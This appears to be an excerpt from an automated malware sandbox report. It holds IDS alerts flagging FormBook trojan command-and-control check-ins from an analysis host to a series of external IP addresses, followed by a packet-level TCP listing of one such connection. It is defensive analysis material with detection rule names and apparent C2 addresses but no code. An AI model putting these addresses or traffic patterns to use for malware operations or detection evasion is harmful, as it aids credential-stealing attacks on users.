                                                      07/09/24-12:09:47.673365 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49737 | 80 | 192.168.2.9 | 188.114.96.3
                                                      07/09/24-12:10:21.548355 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49747 | 80 | 192.168.2.9 | 162.254.38.56
                                                      07/09/24-12:10:40.838976 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49752 | 80 | 192.168.2.9 | 142.250.185.147
                                                      07/09/24-12:08:35.398619 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49717 | 80 | 192.168.2.9 | 103.42.108.46
                                                      07/09/24-12:10:07.968762 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49743 | 80 | 192.168.2.9 | 154.12.34.252
                                                      07/09/24-12:10:13.803996 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49744 | 80 | 192.168.2.9 | 162.254.38.56
                                                      07/09/24-12:10:27.367616 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49748 | 80 | 192.168.2.9 | 5.252.229.221
                                                      07/09/24-12:08:55.539602 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49723 | 80 | 192.168.2.9 | 188.114.96.3
                                                      07/09/24-12:11:23.430709 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49764 | 80 | 192.168.2.9 | 94.130.217.114
                                                      07/09/24-12:10:00.222302 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49740 | 80 | 192.168.2.9 | 154.12.34.252
                                                      07/09/24-12:11:11.535008 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49761 | 80 | 192.168.2.9 | 38.145.202.186
                                                      07/09/24-12:10:35.094051 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49751 | 80 | 192.168.2.9 | 5.252.229.221
                                                      07/09/24-12:11:45.068161 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49771 | 80 | 192.168.2.9 | 84.32.84.32
                                                      07/09/24-12:08:50.338513 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49721 | 80 | 192.168.2.9 | 188.114.96.3
                                                      07/09/24-12:10:16.382255 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49745 | 80 | 192.168.2.9 | 162.254.38.56
                                                      07/09/24-12:08:40.543474 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49719 | 80 | 192.168.2.9 | 103.42.108.46
                                                      07/09/24-12:09:24.363900 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49731 | 80 | 192.168.2.9 | 35.212.86.52
                                                      07/09/24-12:10:43.430684 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49753 | 80 | 192.168.2.9 | 142.250.185.147
                                                      07/09/24-12:09:05.318239 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49725 | 80 | 192.168.2.9 | 134.122.138.60
                                                      07/09/24-12:09:30.239032 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49732 | 80 | 192.168.2.9 | 188.114.97.3
                                                      07/09/24-12:09:16.606161 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49728 | 80 | 192.168.2.9 | 35.212.86.52
                                                      07/09/24-12:09:38.004077 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49735 | 80 | 192.168.2.9 | 188.114.97.3
                                                      07/09/24-12:10:02.804055 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49741 | 80 | 192.168.2.9 | 154.12.34.252
                                                      07/09/24-12:10:54.515112 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49756 | 80 | 192.168.2.9 | 185.181.104.242
                                                      07/09/24-12:11:37.104571 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49768 | 80 | 192.168.2.9 | 84.32.84.32
                                                      07/09/24-12:09:19.190131 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49729 | 80 | 192.168.2.9 | 35.212.86.52
                                                      07/09/24-12:11:02.820585 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49759 | 80 | 192.168.2.9 | 185.181.104.242
                                                      07/09/24-12:11:39.911847 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49769 | 80 | 192.168.2.9 | 84.32.84.32
                                                      07/09/24-12:09:10.495852 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49727 | 80 | 192.168.2.9 | 134.122.138.60
                                                      07/09/24-12:11:08.956190 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49760 | 80 | 192.168.2.9 | 38.145.202.186
                                                      07/09/24-12:11:25.996162 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49765 | 80 | 192.168.2.9 | 94.130.217.114
                                                      07/09/24-12:09:52.842522 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49739 | 80 | 192.168.2.9 | 188.114.96.3
                                                      07/09/24-12:09:45.087320 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49736 | 80 | 192.168.2.9 | 188.114.96.3
                                                      07/09/24-12:10:29.937727 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49749 | 80 | 192.168.2.9 | 5.252.229.221
                                                      07/09/24-12:10:57.095264 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49757 | 80 | 192.168.2.9 | 185.181.104.242
                                                      07/09/24-12:08:11.644897 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49715 | 80 | 192.168.2.9 | 142.250.185.211
                                                      07/09/24-12:08:32.822233 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49716 | 80 | 192.168.2.9 | 103.42.108.46
                                                      07/09/24-12:09:02.725888 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49724 | 80 | 192.168.2.9 | 134.122.138.60
                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      Jul 9, 2024 12:08:41.663275003 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.663392067 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.663919926 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.664001942 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.664016962 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.664062977 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.664231062 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.664246082 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.664288998 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.666430950 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.666500092 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.751796007 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.751821995 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.751966000 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.879272938 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.879328012 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.879344940 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.879374981 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.879425049 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.879492044 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.879513979 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.879627943 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.879643917 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.879659891 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.879666090 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.879692078 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.879935980 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.880062103 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.880078077 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.880094051 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.880100012 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.880110025 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.880125046 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.880126953 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.880157948 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.880506039 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.880553961 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.880589962 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.880673885 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.880688906 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.880706072 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.880723000 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.881455898 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.881514072 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.881548882 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.881563902 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.881580114 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.881596088 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.881599903 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.881612062 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.881628036 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.881629944 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.881645918 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.881664038 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.881829977 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.881846905 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.881863117 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.881866932 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.881901026 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.882165909 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.882181883 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.882196903 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.882211924 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.882215023 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.882245064 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.882627010 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.882642031 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.882658005 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.882673025 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.882678032 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.882689953 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.882704973 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.882715940 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.882740021 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.883296967 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.883311987 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.883327007 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.883343935 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.883357048 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.883359909 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.883375883 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.883382082 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.883393049 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.883409977 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.884011984 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.884030104 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.884053946 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.884179115 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.884301901 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.969871998 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.011029005 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.097639084 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.097696066 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.097754955 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.097789049 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.097824097 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.097858906 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.097870111 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.097894907 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.097932100 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.098190069 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.098203897 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.098223925 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.098259926 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.098339081 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.098498106 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.098532915 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.098566055 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.098568916 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.098653078 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.098807096 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.098861933 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.098896027 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.098929882 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.098938942 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.098963976 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.098987103 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.098998070 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.099033117 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.099067926 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.099071980 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.099194050 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.099713087 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.099747896 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.099781036 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.099816084 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.099852085 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.099855900 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.099886894 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.099920988 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.099939108 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.099955082 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.099991083 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.099992037 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.100042105 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.100678921 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.100713968 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.100748062 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.100764990 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.100781918 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.100819111 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.100821018 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.100852966 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.100886106 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.100918055 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.100923061 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.100955963 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.100969076 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.101043940 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.101630926 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.101666927 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.101701975 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.101736069 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.101799011 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.101830006 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.101866961 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.101876020 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.101901054 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.101934910 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.101958036 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.101968050 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.102041006 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.102626085 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.102719069 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.102799892 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.103009939 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.103044987 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.103086948 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.103142023 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.103214025 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.103379965 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.103416920 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.103516102 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.103518009 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.103553057 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.103677034 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.106189013 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.106225014 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.106257915 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.106309891 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.106343985 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.106347084 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.106376886 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.106412888 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.106421947 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.106446028 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.106476068 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.106502056 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.106509924 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.106544018 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.106564999 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.106595039 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.106628895 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.106642008 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.106662035 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.106695890 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.106724024 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.106731892 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.106767893 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.106770992 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.106801987 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.106829882 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.106837034 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.106870890 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.106904984 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.106920958 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.106942892 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.106977940 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.106998920 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.107007980 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.107055902 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.107108116 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.107583046 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.188901901 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.188929081 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.188946009 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.189076900 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.189091921 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.189106941 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.189122915 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.189153910 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.189153910 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.189153910 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.189498901 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.189546108 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.189619064 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.189635038 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.189651012 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.189666986 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.189671040 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.189683914 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.535330057 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.535548925 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.535645008 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.535660982 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.535676956 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.535691977 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.535751104 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.535752058 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.536050081 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.536067009 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.536082029 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.536091089 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.536098957 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.536118031 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.536123037 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.536159992 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.536612988 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.536628008 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.536645889 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.536660910 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.536664009 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.536678076 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.536693096 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.536695004 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.536710024 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.536726952 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.536732912 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.536745071 CEST8049719103.42.108.46192.168.2.9
